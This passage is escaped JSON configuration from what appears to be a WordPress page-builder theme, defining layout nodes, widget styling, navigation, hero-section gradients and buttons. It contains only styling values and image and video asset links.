"v\":\"1.1\",\"nodes\":[\"438-s1\",\"46-s1\"]},{\"id\":177,\"type\":\"hop-section\",\"nodeId\":\"28-s9\",\"nodes\":[\"438-s2\",\"46-s2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\"}}}}},\"v\":\"1.1\"},{\"id\":178,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"28-s13\",\"nodes\":[\"438-s13\",\"46-s13\"],\"v\":\"1.1\"},{\"id\":179,\"type\":\"hop-column\",\"nodeId\":\"28-s14\",\"nodes\":[\"438-s14\",\"46-s14\"],\"v\":\"1.1\"},{\"id\":180,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"28-s15\",\"nodes\":[\"438-s15\",\"46-s15\"],\"v\":\"1.1\"},{\"id\":181,\"type\":\"hop-text\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s16\",\"46-s16\"],\"v\":\"1.1\"},{\"id\":182,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1},\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"nodeId\":\"28-s10\",\"nodes\":[\"438-s3\",\"46-s3\"],\"v\":\"1.1\"},{\"id\":183,\"type\":\"hop-column\",\"nodeId\":\"28-s12\",\"nodes\":[\"438-s4\",\"46-s4\"],\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":184,\"type\":\"hop-widget-area\",\"nodeId\":\"1719-s2\",\"style\":{\"descendants\":{\"widgetBox\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"20\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"textAlign\":\"center\"}}},\"widgetListItemLink\":{\"typography\":{\"color\":\"${theme.colors.4|variant3}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"widgetListItem\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"padding\":{\"top\":{\"value\":\"4\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"4\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"widgetTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"widgetList\":{\"listStyleType\":\"none\"},\"widgetInput\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"focus\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}}}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}}},\"v\":\"1.1\",\"nodes\":[\"438-s5\",\"46-s5\"]},{\"id\":185,\"type\":\"hop-search-widget\",\"nodeId\":\"1719-s3\",\"style\":{\"descendants\":{\"widget-box\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},\"background\":{\"color\":\"\"}},\"widget-title\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}},\"bottom\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}},\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}},\"widget-input\":{\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}},\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"widget-button\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"transition\":{\"duration\":{\"value\":\"0.5\"}},\"typography\":{\"color\":\"${theme.colors.5}\"},\"display\":\"inline-block\",\"background\":{\"color\":\"rgb(249, 250, 251)\"}},\"widget-button-icon\":{\"display\":\"inline-block\"},\"widget-button-text\":{\"display\":\"none\"},\"widget-input-placeholder\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"v\":\"1.1\",\"nodes\":[\"438-s6\",\"46-s6\"],\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}}},{\"id\":186,\"type\":\"hop-recent-post-widget\",\"nodeId\":\"1719-s4\",\"v\":\"1.1\",\"nodes\":[\"438-s7\",\"46-s7\"]},{\"id\":187,\"type\":\"hop-recent-comments-widget\",\"nodeId\":\"1719-s5\",\"v\":\"1.1\",\"nodes\":[\"438-s8\",\"46-s8\"]},{\"id\":188,\"type\":\"hop-archives-widget\",\"nodeId\":\"1719-s6\",\"v\":\"1.1\",\"props\":{\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false},\"nodes\":[\"438-s9\",\"46-s9\"]},{\"id\":189,\"type\":\"hop-categories-widget\",\"nodeId\":\"1719-s7\",\"v\":\"1.1\",\"nodes\":[\"438-s10\",\"46-s10\"]},{\"id\":190,\"type\":\"hop-meta-widget\",\"nodeId\":\"1719-s8\",\"v\":\"1.1\",\"nodes\":[\"438-s11\",\"46-s11\"]},{\"id\":191,\"type\":\"hop-text-widget\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s12\",\"46-s12\"],\"v\":\"1.1\"},{\"id\":192,\"nodeId\":\"25-h28\",\"nodes\":[\"25-h28\"],\"style\":[],\"v\":\"1.1\"},{\"id\":193,\"type\":\"hop-content\",\"nodeId\":\"20-c1\",\"nodes\":[\"20-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":194,\"type\":\"hop-header\",\"v\":\"1.1\",\"nodes\":[\"22-h1\"]},{\"id\":195,\"style\":{\"ancestor\":{\"sticky\":{\"background\":{\"color\":\"#ffffff\"},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"0\",\"blur\":\"4\"}]}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"20\"},\"bottom\":{\"path\":\"value\",\"value\":\"20\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"background\":{\"color\":\"#ffffff\"}},\"type\":\"hop-navigation\",\"props\":{\"overlap\":false,\"sticky\":true,\"stickyStartAt\":\"immediately\",\"width\":\"boxed\",\"showTopBar\":false},\"v\":\"1.1\",\"nodes\":[\"22-h2\"]},{\"id\":196,\"props\":{\"containerWidth\":\"boxed\",\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h66\"]},{\"id\":197,\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h67\"]},{\"id\":198,\"type\":\"hop-logo\",\"props\":{\"horizontalTextAlign\":\"left\",\"media\":{\"mobile\":{\"horizontalTextAlign\":\"left\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h68\"]},{\"id\":199,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"22-h6\"]},{\"id\":200,\"type\":\"hop-spacer\",\"v\":\"1.1\",\"nodes\":[\"22-h7\"]},{\"id\":201,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"textAlign\":\"center\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h70\"]},{\"id\":202,\"type\":\"hop-horizontal-menu\",\"style\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.0|variant3}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\",\"media\":{\"mobile\":{\"justifyContent\":\"center\"}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"props\":{\"hoverEffect\":{\"type\":\"bordered-active-item bordered-active-item--bottom\",\"activeGroup\":\"border\"}},\"v\":\"1.1\",\"nodes\":[\"22-h71\"]},{\"id\":203,\"type\":\"hop-mobile-menu\",\"v\":\"1.1\",\"nodes\":[\"22-h72\"]},{\"id\":204,\"type\":\"hop-offscreen-panel\",\"v\":\"1.1\",\"nodes\":[\"22-h73\"]},{\"id\":205,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"v\":\"1.1\",\"nodes\":[\"22-h74\"]},{\"id\":206,\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h75\"]},{\"id\":207,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"22-h76\"]},{\"id\":208,\"type\":\"hop-logo\",\"v\":\"1.1\",\"nodes\":[\"22-h77\"]},{\"id\":209,\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h78\"]},{\"id\":210,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"22-h79\"]},{\"id\":211,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"22-h80\"]},{\"id\":212,\"style\":{\"typography\":{\"holders\":{\"h1\":{\"color\":\"${theme.colors.4}\"},\"h2\":{\"color\":\"${theme.colors.4}\"},\"h3\":{\"color\":\"${theme.colors.4}\"},\"h4\":{\"color\":\"${theme.colors.4}\"},\"h5\":{\"color\":\"${theme.colors.4}\"},\"h6\":{\"color\":\"${theme.colors.4}\"},\"p\":{\"color\":\"${theme.colors.4}\"}}},\"background\":{\"type\":\"image\",\"overlay\":{\"enabled\":true,\"type\":\"color\",\"gradient\":{\"angle\":\"-20\",\"steps\":[{\"color\":\"rgba(183, 33, 255, 0.8)\",\"position\":\"0\"},{\"color\":\"rgba(33, 212, 253, 0.8)\",\"position\":\"100\"}]},\"shape\":{\"value\":\"circles-2\",\"isTile\":false},\"color\":{\"value\":\"rgb(212, 211, 225)\",\"opacity\":\"0.5\"},\"light\":0},\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-cropped-header-scaled-1.jpg\"},\"position\":{\"x\":48.828125,\"y\":48.69319869319869}}],\"video\":{\"internalUrl\":\"http:\\/\\/gabi.extendstudio.net\\/header3-freefree\\/wp-content\\/uploads\\/2019\\/06\\/Photography-21188.mp4\",\"internalVideoMime\":\"video\\/mp4\",\"videoType\":\"external\",\"externalUrl\":\"\"},\"color\":\"\"},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"150\",\"path\":\"value\"},\"bottom\":{\"unit\":\"px\",\"value\":\"150\",\"path\":\"value\"}},\"customHeight\":{\"type\":\"full-screen\",\"min-height\":{\"unit\":\"px\",\"value\":758.40625}},\"media\":{\"mobile\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/colibri-image-298.png\"}}]}}},\"separatorBottom\":{\"enabled\":true,\"height\":{\"unit\":\"px\",\"value\":121},\"color\":\"white\",\"type\":\"watercolor\",\"negative\":false},\"separatorTop\":{\"enabled\":true,\"height\":{\"unit\":\"px\",\"value\":165},\"color\":\"white\",\"type\":\"brush strokes\",\"negative\":false}},\"props\":{\"heroSection\":{\"layout\":\"textWithMediaOnRight\",\"mediaType\":\"hop-image\"},\"attrs\":{\"name\":\"hero\",\"id\":\"hero\"},\"width\":\"boxed\",\"verticalAlign\":\"center\",\"downArrow\":{\"enabled\":false}},\"type\":\"hop-hero\",\"v\":\"1.1\",\"nodes\":[\"22-h24\"]},{\"id\":213,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":3,\"verticalInnerGap\":3}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h25\"]},{\"id\":214,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"9\",\"unit\":\"px\"},\"right\":{\"value\":\"9\",\"unit\":\"px\"}}},\"right\":{\"style\":\"solid\"},\"bottom\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"9\",\"unit\":\"px\"},\"right\":{\"value\":\"9\",\"unit\":\"px\"}}},\"left\":{\"style\":\"solid\"}},\"textAlign\":\"center\",\"media\":{\"tablet\":{\"textAlign\":\"center\"},\"mobile\":{\"textAlign\":\"center\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h26\"]},{\"id\":215,\"props\":{\"headerType\":\"3\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"22-h27\"],\"style\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"\"},\"weight\":\"600\"}}},{\"id\":216,\"props\":{\"type\":\"lead\"},\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"22-h28\"],\"style\":{\"typography\":{\"holders\":{\"p\":{\"color\":\"${theme.colors.5}\"}}}}},{\"id\":217,\"type\":\"hop-button-group\",\"v\":\"1.1\",\"nodes\":[\"22-h31\"]},{\"id\":218,\"style\":{\"background\":{\"color\":\"${theme.colors.0}\",\"type\":\"none\",\"image\":[{\"source\":{\"type\":\"gradient\",\"gradient\":{\"angle\":\"0\",\"steps\":[{\"color\":\"#00c6fb\",\"position\":\"0\"},{\"color\":\"#005bea\",\"position\":\"100\"}]}}}]},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\",\"unit\":\"\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"12\"},\"bottom\":{\"unit\":\"px\",\"value\":\"12\"},\"left\":{\"unit\":\"px\",\"value\":\"24\"},\"right\":{\"unit\":\"px\",\"value\":\"24\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"textAlign\":\"center\",\"boxShadow\":{\"enabled\":false}},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"medium\",\"buttonWidth\":\"fitToContent\"},\"v\":\"1.1\",\"nodes\":[\"22-h32\"]},{\"id\":219,\"style\":{\"background\":{\"color\":\"transparent\"},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"},\"left\":{\"unit\":\"px\",\"value\":\"30\"},\"right\":{\"unit\":\"px\",\"value\":\"30\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(255, 255, 255, 0.2)\"},\"border\":{\"top\":{\"color\":\"${theme.colors.4}\"},\"left\":{\"color\":\"${theme.colors.4}\"},\"right\":{\"color\":\"${theme.colors.4}\"},\"bottom\":{\"color\":\"${theme.colors.4}\"}}}},\"textAlign\":\"center\"},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"large\"},\"v\":\"1.1\",\"nodes\":[\"22-h57\"]},{\"id\":220,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"22-h29\"],\"style\":{\"background\":{\"color\":\"${theme.colors.5}\"}}},{\"id\":221,\"type\":\"hop-image\",\"v\":\"1.1\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"opacity\":{\"value\":1},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0,0,0,0.5)\"}]}},\"overlay\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit